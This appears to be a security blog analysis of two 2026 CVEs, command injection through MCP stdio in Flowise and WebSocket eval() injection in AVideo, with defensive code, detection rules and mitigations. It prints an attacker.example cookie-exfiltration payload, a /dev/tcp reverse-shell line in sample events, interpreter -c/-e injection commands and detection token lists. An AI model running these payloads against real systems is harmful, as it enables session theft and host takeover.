An allowlist of five commands, a validateCommandInjection() function and a validateArgsForLocalFileAccess() check: three layers of protection between user input and the subprocess in Flowise. A payload built on npx -c walked through all three. Next on the timeline is AVideo, with two client-side eval() sinks that execute arbitrary JavaScript in the browser of every user connected over WebSocket. No authentication. None at all.
CVE-2026-40933 (CVSS 9.9) and CVE-2026-40911 (CVSS 10.0), both published in April 2026, are two different vulnerability classes that hit the same spot: AI and media platforms where trust in user-supplied data is built directly into the architecture. The same anti-patterns that killed hand-written PHP scripts five years ago, eval() and subprocess exec() without sanitization, now live in LLM builders with drag-and-drop interfaces.
Below is a full analysis of both vectors, reproducible setup, mapping to MITRE ATT&CK and concrete indicators of compromise.
CVE-2026-40933: command injection via MCP stdio in Flowise (CVSS 9.9)
Flowise is an open-source LLM flow builder with a drag-and-drop interface, roughly 200,000 active instances and ~150 million total downloads (OX Security data, April 2026). The platform supports the Model Context Protocol to connect language models to external tools over two transports: HTTP/SSE for remote servers and stdio for local processes. The entire vulnerability is concentrated in the stdio transport. The GitHub repository is actively maintained; the fix shipped in version 3.1.0.
CVE-2026-40933 is CWE-78 (OS Command Injection), vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H, 9.9 (CRITICAL). Reading it: PR:L, any registered user is enough; AC:L, no race condition or tricky preconditions; S:C (scope change), exploitation in the context of Flowise yields access to the host OS, so the compromise reaches resources beyond the vulnerable component. All Flowise versions before 3.1.0 are affected.
The root cause is in how the MCP adapter processes stdio server configurations. When a user adds a Custom MCP node through the canvas interface (http://localhost:3000/canvas), they supply two parameters in StdioServerParameters: command (the executable) and args (its arguments). The code contains three protective mechanisms:
1. validateCommandInjection() - checks the command for typical injection patterns
2. validateArgsForLocalFileAccess() - restricts access to local files through arguments
3. A predefined allowlist: python, node, npm, npx, dotnet
The problem is fundamental: the allowlist checks only the name of the executable and ignores the semantics of the arguments. npx is a legitimate Node.js tool. But npx -c "arbitrary_shell_code" is full OS command execution. Likewise python -c "import os; os.system('...')" and node -e "require('child_process').exec('...')". This is the classic failure of the blocklist approach: it is impossible to foresee every combination of a permitted binary with a dangerous flag. Flowise's sanitization functions look for patterns such as ; rm -rf / in the command string but do not analyze the context of a -c or -e argument. On paper there is protection. In practice, a hole.
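To make the failure concrete, here is an added illustration in JavaScript (Flowise is written in TypeScript) that is not Flowise's code: an allowlist-by-name check of the kind described above, beside a default-deny variant that treats every option flag as forbidden unless explicitly permitted. The function names, the benign-option table and the sample command lines are assumptions made for the example; only the five allowlisted binaries come from the text.

```javascript
// Added illustration, not Flowise code: the allowlist-by-name pattern the
// text describes next to a default-deny variant. Function names, the
// benign-option table and the sample inputs below are assumptions.
const ALLOWED_BINARIES = new Set(["python", "node", "npm", "npx", "dotnet"]);
// The kind of pattern a "command injection" filter typically greps for.
const SHELL_META = /\brm\s+-rf\b|&&|\|\||`|\$\(/;
const basename = (p) => p.split("/").pop();

// Vulnerable pattern: only the executable name and a few shell idioms are
// inspected, so `npx -c id` or `python -c "..."` pass untouched.
function allowByNameOnly(command, args) {
  if (!ALLOWED_BINARIES.has(basename(command))) return false;
  return !SHELL_META.test([command, ...args].join(" "));
}

// Per-binary option allowlist (default deny). Any argument starting with "-"
// that is not listed is rejected, which covers -c/-e/-p/--eval/--require and
// every flag nobody thought of yet. The lists are example values.
const BENIGN_OPTIONS = {
  python: new Set(["-u", "-B", "-I"]),
  node: new Set(["--no-warnings"]),
  npx: new Set(["-y", "--yes", "-q", "--quiet"]),
  npm: new Set(),
  dotnet: new Set(),
};
// Positional words that themselves run arbitrary code or scripts.
const DENIED_POSITIONALS = {
  python: new Set(),
  node: new Set(),
  npx: new Set(),
  npm: new Set(["exec", "x", "run", "run-script", "explore"]),
  dotnet: new Set(["script", "fsi", "run"]),
};

function allowStrict(command, args) {
  const bin = basename(command);
  if (!ALLOWED_BINARIES.has(bin)) return false;
  if (SHELL_META.test([command, ...args].join(" "))) return false;
  for (const arg of args) {
    const opt = arg.split("=")[0];                 // handle --flag=value
    if (opt.startsWith("-") && !BENIGN_OPTIONS[bin].has(opt)) return false;
    if (DENIED_POSITIONALS[bin].has(arg)) return false;
  }
  return true;
}

// Constructed sample inputs, not captured traffic.
const SAMPLES = [
  { command: "npx", args: ["-y", "@modelcontextprotocol/server-filesystem", "/srv/docs"] },
  { command: "npx", args: ["-c", "id"] },
  { command: "python", args: ["-c", "import os; os.system('id')"] },
  { command: "node", args: ["-e", "require('child_process').exec('id')"] },
  { command: "node", args: ["--require=./hook.js", "server.js"] },
  { command: "npm", args: ["exec", "--", "sh"] },
  { command: "/usr/bin/bash", args: ["-c", "id"] },
];

// One row per sample: what the weak check says versus the strict one.
function compare() {
  return SAMPLES.map((s) => ({
    cmdline: [s.command, ...s.args].join(" "),
    nameOnly: allowByNameOnly(s.command, s.args),
    strict: allowStrict(s.command, s.args),
  }));
}

console.table(compare());
```

Only the first sample, a stock MCP filesystem server, survives the strict check; every code-execution variant that the name-only check waves through is rejected. Note that even allowStrict is still a policy over user-controlled strings: the robust fix is to not let end users choose command and args at all, and to let administrators register stdio servers out of band. Path handling (what validateArgsForLocalFileAccess() covers) is deliberately out of scope here.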
The vulnerable code paths live in the Flowise MCP adapter (details in advisory GHSA-c9gw-hwqq-f33r; take specific files and line numbers from the current version of the advisory).
PoC: from Custom MCP to an arbitrary command on the host
Environment setup:
• Flowise < 3.1.0, self-hosted instance
• An authenticated session (any privilege level; low-priv is enough)
• Access to the canvas web interface (/canvas)
• Docker or a VM with Ubuntu 22.04+, at least 2 GB RAM, Node.js 18+
• Flowise started via npx flowise start or from the flowiseai/flowise Docker image
• Internet access is not required; exploitation is local
CVE-2026-40911: eval() injection via WebSocket in AVideo (CVSS 10.0)
AVideo (WWBN) is an open-source video platform. CVE-2026-40911 is fundamentally different from the Flowise case: CWE-94 (Improper Control of Generation of Code), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H, 10.0 (CRITICAL). Every component at its maximum: PR:N, no authentication needed; UI:N, no user interaction required; S:C, scope change.
AVideo versions 29.0 and below are affected.
The architecture of the vulnerability is different: there is no server-side OS command injection. The server component is an amplifier: it relays the malicious payload to every connected client, where it lands in eval(). The server is an obedient postman delivering the bomb to every mailbox at once.
The YPTSocket plugin implements the WebSocket server for real-time features (chat, notifications, live streaming). The server side accepts JSON from any client and relays it to all connected users without sanitizing the msg and callback fields. On the client side, the file plugin/YPTSocket/script.js contains two eval() sinks:
• Line 568: eval(json.msg.autoEvalCodeOnHTML) - the autoEvalCodeOnHTML field of the inbound JSON is executed as JavaScript
• Line 95: eval(json.callback) - the callback field of the same JSON message also goes straight to eval()
Two eval() calls in one file are like two open windows on the ground floor. You can climb in through either.
Tokens for WebSocket connections are issued to anonymous visitors and are never re-validated. Anyone can connect and send malicious JSON, and the payload executes in the browser of every active user of the platform.
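The two sinks reduced to their essence, beside a message handler that never hands socket data to eval(). This is an added illustration, not AVideo's script.js: the handler names, the message shapes and the `ran` array (which stands in for visible effects in a victim's browser) are assumptions; only the field names callback and msg.autoEvalCodeOnHTML come from the advisory.

```javascript
// Added illustration, not AVideo code: the two client-side sinks the text
// describes, next to a dispatch that never passes socket data to eval().
// Handler names and message shapes are assumptions; `ran` stands in for
// visible effects in the victim's browser.
const ran = [];

// Vulnerable pattern (the shape of the two sinks in script.js): whatever the
// relay delivers in `callback` or `msg.autoEvalCodeOnHTML` is executed.
function onSocketMessageVulnerable(raw) {
  const json = JSON.parse(raw);
  if (json.callback) eval(json.callback);
  if (json.msg && json.msg.autoEvalCodeOnHTML) eval(json.msg.autoEvalCodeOnHTML);
}

// Hardened pattern: `callback` is a name looked up in a fixed table of
// functions the page already ships. Code never arrives over the socket.
const HANDLERS = {
  onChatMessage(msg) { ran.push(`chat:${String(msg.text)}`); },
  onLiveStatus(msg) { ran.push(`live:${String(msg.status)}`); },
};

function onSocketMessageSafe(raw) {
  let json;
  try { json = JSON.parse(raw); } catch { return { accepted: false, reason: "not JSON" }; }
  const name = json && json.callback;
  // hasOwnProperty, so "constructor", "__proto__" or "toString" do not resolve.
  if (typeof name !== "string" || !Object.prototype.hasOwnProperty.call(HANDLERS, name)) {
    return { accepted: false, reason: `unknown callback ${String(name)}` };
  }
  if (typeof json.msg !== "object" || json.msg === null) {
    return { accepted: false, reason: "msg is not an object" };
  }
  HANDLERS[name](json.msg);
  return { accepted: true, handler: name };
}

// Constructed frames, not captured traffic. The first is a legitimate chat
// event; the others carry code in the two fields the sinks read.
const FRAMES = {
  chat: JSON.stringify({ callback: "onChatMessage", msg: { text: "hello" } }),
  viaCallback: JSON.stringify({ callback: "ran.push('pwned-via-callback')" }),
  viaAutoEval: JSON.stringify({ msg: { autoEvalCodeOnHTML: "ran.push('pwned-via-autoEval')" } }),
  protoProbe: JSON.stringify({ callback: "constructor", msg: {} }),
};

// Feeds the attack frames to the vulnerable handler and every frame to the
// safe one; returns what each path actually executed.
function runDemo() {
  ran.length = 0;
  onSocketMessageVulnerable(FRAMES.viaCallback);
  onSocketMessageVulnerable(FRAMES.viaAutoEval);
  const vulnerableRan = ran.slice();
  ran.length = 0;
  const safe = Object.fromEntries(
    Object.entries(FRAMES).map(([k, f]) => [k, onSocketMessageSafe(f)])
  );
  return { vulnerableRan, safe, safeRan: ran.slice() };
}

console.log(JSON.stringify(runDemo(), null, 2));
```

The vulnerable path executes both attacker strings; the safe path runs exactly one thing, the chat handler, and rejects the code strings, the missing callback and the prototype probe. The server-side fix is the mirror image: validate the frame against a schema before relaying it, rather than forwarding whatever arrived.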
Chain: from anonymous connection to mass compromise
Environment setup:
• AVideo <= 29.0 with the YPTSocket plugin enabled
• WebSocket port reachable over the network
• Tools: wscat, browser DevTools, the Python websockets library, anything with WebSocket support
• RAM and OS do not matter; the attack runs from any client
AVideo XSS-to-RCE chain:
1. The attacker connects to the AVideo WebSocket server; an anonymous token is issued automatically
2. Sends JSON with the payload in the field msg.autoEvalCodeOnHTML or callback
3. The server relays the message to all connected clients without filtering
4. In every browser, script.js calls eval() on the received data
5. JavaScript executes in the context of every user session, administrators included
Example payload demonstrating client-side cookie exfiltration (JSON):
{
  "msg": {
    "autoEvalCodeOnHTML": "new Image().src='https://attacker.example/c?c='+document.cookie"
  }
}
The result: exfiltration of cookies and session tokens from every connected user (document.cookie will not expose cookies flagged HttpOnly, but the payload can then drive the authenticated session from inside the victim's browser instead). Once an administrator is caught, the attacker holds their session and full control of the platform. The next step is uploading a web shell through AVideo's administrative interface, which turns this into server-side RCE. CVE-2026-40911 makes every connected user an involuntary relay.
ATT&CK mapping: Exploit Public-Facing Application (T1190, Initial Access) → JavaScript (T1059.007, Execution) → Exploitation for Client Execution (T1203, Execution). Capturing the admin session fits Steal Web Session Cookie (T1539) and Use Alternate Authentication Material: Web Session Cookie (T1550.004) more precisely than T1068, which covers exploiting a privilege-escalation bug.
Where eval() injection in AVideo will not work
• AVideo versions newer than 29.0, where the developers fixed WebSocket message handling
• YPTSocket plugin disabled: without the WebSocket server there is no delivery vector
• A CSP (Content-Security-Policy) with script-src 'self' and no 'unsafe-eval': the browser blocks eval(). In practice most self-hosted AVideo instances do not configure CSP
• A WAF with WebSocket frame inspection: a rarity, since the vast majority of WAFs do not understand WebSocket
• An isolated network where the attacker cannot reach the WebSocket port
The key difference from Flowise: AVideo requires no credentials at all. That is exactly what CVSS 10.0 means: fully reachable by an anonymous attacker, with maximum impact. Flowise: "Give me a low-priv account and I'll take the host." AVideo: "Give me network access and I'll take every user's browser."
MCP stdio as a systemic attack surface in LLM infrastructure
CVE-2026-40933 is not an isolated case. It is part of a series of more than 14 CVEs documented by OX Security in the MCP ecosystem ("The Mother of All AI Supply Chains", April 2026). One root problem, unsafe passing of user input to a subprocess through the stdio transport, recurs across several platforms:

Different CWEs, one pattern: user input reaches a code-execution function without adequate validation. Note LibreChat: CWE-285 means the problem is not sanitization but authorization. The MCP stdio path accepts arbitrary commands without checking permissions, so any authenticated user runs shell commands as root inside the container. Three different vulnerability classes, one vector: OS injection through AI infrastructure.
The MCP protocol's architecture means the SDKs for Python, TypeScript, Java and Rust pass command and args straight to a subprocess by design. Sanitization is the responsibility of the client application's developer; the protocol itself imposes no restrictions. For the pentester this means every MCP stdio integration is a potential entry point. You need to check not only the application but how it uses the SDK.
Four MCP stdio exploitation vectors according to OX Security:

Checklist for a pentester encountering LLM infrastructure:

Detection: IoCs and monitoring strategies
Indicators of compromise for CVE-2026-40933
• New MCP stdio server configurations appearing in Flowise; track them through application audit logs
• Child processes of the Flowise Node.js process with arguments -c, -e, exec, bash, sh; monitor via EDR or auditd
• File creation in /tmp/ and other atypical directories by the user Flowise runs as
• Outbound TCP connections from Flowise to unknown IPs (reverse-shell indicator)
• HTTP POST to the canvas endpoint with a JSON body containing "transport_type": "stdio" together with suspicious command/args values
At the SIEM level: alert on the pattern "parent process = node/flowise, child process cmdline contains -c or -e" (T1059, Command and Scripting Interpreter). For auditd, a rule on execve keyed to the uid or executable Flowise runs as; auditctl filters on uid/euid/exe, not on cgroup, so tie the service account down first.
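The SIEM rule above, applied to constructed process-creation events, as an added example that is not Flowise's or any vendor's code. The event shape (parent_comm, parent_cmdline, comm, cmdline, uid), the Flowise service uid and the sample events are assumptions; map your EDR or auditd export onto the same fields.

```javascript
// Added example, not Flowise or vendor code: the SIEM rule from the text
// applied to constructed process-creation events. Event shape, the service
// uid and the sample events are assumptions.
const SHELLS = new Set(["sh", "bash", "dash", "zsh", "ksh"]);
const INTERPRETERS = new Set(["python", "python3", "node", "npx", "npm"]);
const CODE_EXEC_FLAGS = new Set(["-c", "--call", "-e", "--eval", "-p", "--print", "-r", "--require"]);
const FLOWISE_UID = 1001; // assumption: the service account Flowise runs as

// Split a cmdline on whitespace while keeping quoted segments together;
// enough for the patterns below, not a full shell parser.
function tokenize(cmdline) {
  return (cmdline.match(/"[^"]*"|'[^']*'|\S+/g) || []).map((t) => t.replace(/^["']|["']$/g, ""));
}

// Scope the rule: a node parent whose cmdline names flowise, under its uid.
function isFlowiseParent(ev) {
  return ev.parent_comm === "node" && /flowise/i.test(ev.parent_cmdline) && ev.uid === FLOWISE_UID;
}

// Returns a reason string when the child looks like code execution, else null.
function classifyChild(ev) {
  const [argv0, ...rest] = tokenize(ev.cmdline);
  const base = (argv0 || "").split("/").pop();
  if (SHELLS.has(base)) return `shell spawned: ${base}`;
  if (INTERPRETERS.has(base)) {
    const flag = rest.find((a) => CODE_EXEC_FLAGS.has(a.split("=")[0]));
    if (flag) return `${base} with code-execution flag ${flag}`;
    if (base === "npm" && ["exec", "x", "run"].includes(rest[0])) return `npm ${rest[0]}`;
  }
  return null;
}

// One alert per event that is both in scope and suspicious.
function evaluateEvents(events) {
  const alerts = [];
  for (const ev of events) {
    if (!isFlowiseParent(ev)) continue;
    const reason = classifyChild(ev);
    if (reason) alerts.push({ ts: ev.ts, pid: ev.pid, reason, cmdline: ev.cmdline, technique: "T1059" });
  }
  return alerts;
}

// Constructed events, not a real capture. Parent cmdline is an assumed
// install path; the third event is a reverse shell to a documentation-range IP.
const FLOWISE = "node /usr/local/lib/node_modules/flowise/bin/run start";
const EVENTS = [
  { ts: "2026-04-20T10:00:01Z", pid: 4101, uid: 1001, parent_comm: "node", parent_cmdline: FLOWISE,
    comm: "npx", cmdline: "npx -y @modelcontextprotocol/server-filesystem /srv/docs" },
  { ts: "2026-04-20T10:02:17Z", pid: 4188, uid: 1001, parent_comm: "node", parent_cmdline: FLOWISE,
    comm: "npx", cmdline: "npx -c \"id > /tmp/.x\"" },
  { ts: "2026-04-20T10:02:18Z", pid: 4190, uid: 1001, parent_comm: "node", parent_cmdline: FLOWISE,
    comm: "sh", cmdline: "/bin/sh -c \"bash -i >& /dev/tcp/203.0.113.5/4444 0>&1\"" },
  { ts: "2026-04-20T10:05:00Z", pid: 4300, uid: 1000, parent_comm: "node", parent_cmdline: "node build.js",
    comm: "node", cmdline: "node -e \"console.log(1)\"" },
];

console.table(evaluateEvents(EVENTS));
```

The legitimate MCP filesystem server (event 1) and an unrelated developer's node -e (event 4, wrong parent and uid) produce nothing; the npx -c launch and the shell it spawns each produce an alert. Keeping the parent scope tight is what keeps this rule quiet on a CI host full of node -e one-liners.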
Indicators of compromise for CVE-2026-40911
• WebSocket messages whose autoEvalCodeOnHTML or callback fields contain JavaScript (eval, fetch, XMLHttpRequest, document.cookie)
• Bursts of HTTP requests from client browsers to external domains right after WebSocket traffic: a sign of exfiltration
• Atypical administrative actions following a WebSocket connection: user creation, file uploads, configuration changes
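The first indicator above turned into frame inspection, as an added example that is not AVideo's or any vendor's code and could sit in a reverse proxy or in a log pipeline fed by one. The two field names come from the advisory; the token list, the verdict levels and the sample frames are assumptions.

```javascript
// Added example, not AVideo or vendor code: scoring relayed WebSocket text
// frames for code in the two sink fields. Field names come from the advisory;
// the token list, verdict levels and sample frames are assumptions.
const SINK_FIELDS = new Set(["autoEvalCodeOnHTML", "callback"]);
// Tokens that have no business in a chat relay but appear in exfil payloads.
const JS_TOKENS = /\b(eval|fetch|XMLHttpRequest|document\.cookie|localStorage|sessionStorage|new\s+Image|atob|Function|WebSocket)\b/;
// A legitimate callback is a bare handler name, nothing more.
const IDENT = /^[A-Za-z_$][\w$]*$/;

// Walk nested objects; collect every (path, value) where a sink field holds a string.
function collectSinkFields(obj, prefix = "", out = []) {
  if (obj && typeof obj === "object") {
    for (const [k, v] of Object.entries(obj)) {
      const p = prefix ? `${prefix}.${k}` : k;
      if (SINK_FIELDS.has(k) && typeof v === "string") out.push({ path: p, value: v });
      collectSinkFields(v, p, out);
    }
  }
  return out;
}

// Verdict for one text frame: ignore (not JSON), ok, review or alert.
function inspectFrame(text) {
  let json;
  try { json = JSON.parse(text); } catch { return { verdict: "ignore", reason: "not JSON", findings: [] }; }
  const findings = [];
  for (const { path, value } of collectSinkFields(json)) {
    const field = path.split(".").pop();
    if (field === "callback" && IDENT.test(value)) continue;   // bare handler name: expected
    // autoEvalCodeOnHTML is code by definition, so any value is at least "review".
    const level = JS_TOKENS.test(value) ? "alert" : "review";
    findings.push({ path, level, snippet: value.slice(0, 60) });
  }
  const verdict = findings.some((f) => f.level === "alert") ? "alert"
                : findings.length ? "review" : "ok";
  return { verdict, findings };
}

function inspectFrames(frames) {
  return frames.map((f) => ({ frame: f.slice(0, 40), ...inspectFrame(f) }));
}

// Constructed frames, not captured traffic: one legitimate chat event, two
// exfiltration payloads (the second hits the callback sink), a non-JSON
// keepalive and a benign-looking autoEval value that still deserves a look.
const FRAMES = [
  JSON.stringify({ callback: "onChatMessage", msg: { text: "hello" } }),
  JSON.stringify({ msg: { autoEvalCodeOnHTML: "new Image().src='https://attacker.example/c?c='+document.cookie" } }),
  JSON.stringify({ callback: "fetch('https://203.0.113.5/'+localStorage.token)" }),
  "ping",
  JSON.stringify({ msg: { autoEvalCodeOnHTML: "$('#chat').scrollTop(1e9)" } }),
];

console.table(inspectFrames(FRAMES).map((r) => ({ frame: r.frame, verdict: r.verdict })));
```

Anything that lands at "alert" is worth correlating with the second indicator, outbound requests from browsers that follow the frame. The "review" level exists because the plugin does use autoEvalCodeOnHTML legitimately: dropping every frame that carries it would be the CSP trade-off again, just one layer lower.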
Detecting the AVideo attack is harder: the payload is in transit, passes through the WebSocket relay and executes on the client side. A server-side IDS sees only the fact that a message was relayed, not the outcome of eval(). The only stopgap before patching is a CSP header:
NGINX:
# Force CSP for AVideo (blocks eval())
add_header Content-Security-Policy "script-src 'self'; object-src 'none';" always;
Warning: this header will very likely break normal AVideo operation, because the YPTSocket plugin depends architecturally on eval() in legitimate scenarios, and script-src 'self' also blocks inline and third-party scripts. CSP here is an emergency measure before upgrading, not a production solution. Curing the disease by killing the patient is a strategy of sorts, but when the alternative is CVSS 10.0 without a patch, the choice is obvious. One nginx detail: add_header is inherited from the enclosing block only when the current block declares no add_header of its own, so place the directive where every response actually passes through, or repeat it in each location.
On real projects the scenario repeats with depressing regularity: the team deploys Flowise "to try it out", and six months later it has grown integrations with production databases and cloud API keys. A gift on a pentest.
The SDK is low-level by design; spawning a subprocess is expected behavior. But a protocol whose design hands a user-supplied command line to a subprocess without verification creates a systemic incentive for CVE-2026-40933 clones in every product that integrates it. The scope change (S:C) in both CVSS vectors directly reflects this architecture: break the app and you get the host.
Until the MCP stdio architecture changes there will be a new advisory every quarter; only the platform name in the title will change. Check your Flowise/LangFlow/LibreChat instances right now: npx -c id in a Custom MCP node. If it executes, you have the same problem. On WAPT, this chain, from MCP injection to host takeover, is worked through in the server-side exploitation module.